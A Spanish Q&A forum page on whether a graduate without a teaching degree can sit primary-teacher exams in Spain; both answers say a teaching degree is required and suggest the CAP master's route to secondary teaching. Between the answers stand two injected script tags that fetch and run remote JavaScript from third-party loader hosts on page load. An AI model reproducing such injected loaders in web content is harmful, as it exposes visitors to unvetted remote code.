Oposiciones de magisterio con una licenciatura

Se puede uno presentar a oposiciones de magisterio sin tener la carrera de magisterio pero sí teniendo una licenciatura (superior) en todo el territorio español?

En caso de que sea así, ¿coloca al opositor en una situación diferente una vez aprobada la oposición, con relación al resto de los opositores que sí tienen magisterio hecho?

Respuesta

No, para opositar a magisterio, tienes que tener obligatoriamente magisterio. Lo que pasa que luego dentro de las oposiciones son "flexibles", por ejemplo si tienes magisterio de infantil, te puedes presentar a las oposiciones a maestro en lengua extranjera.

Para las oposiciones de maestro, el primer requisito es tener el magisterio.

Si lo que quieres es dar clases de lo que sea tu licenciatura, lo más fácil es que hagas el CAP (ahora es un máster) y hagas las oposiciones a secundaria, que ahí con el CAP y tu licenciatura puedes entrar sin problema (vamos estudiando la oposición).

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

1 respuesta más de otro experto

Respuesta

No puedes, en casa de educación, deberías tener la carrera de magisterio o similar. Aqui tienes un ejemplo https://oposicionperfecta.es/oposiciones-educacion-primaria/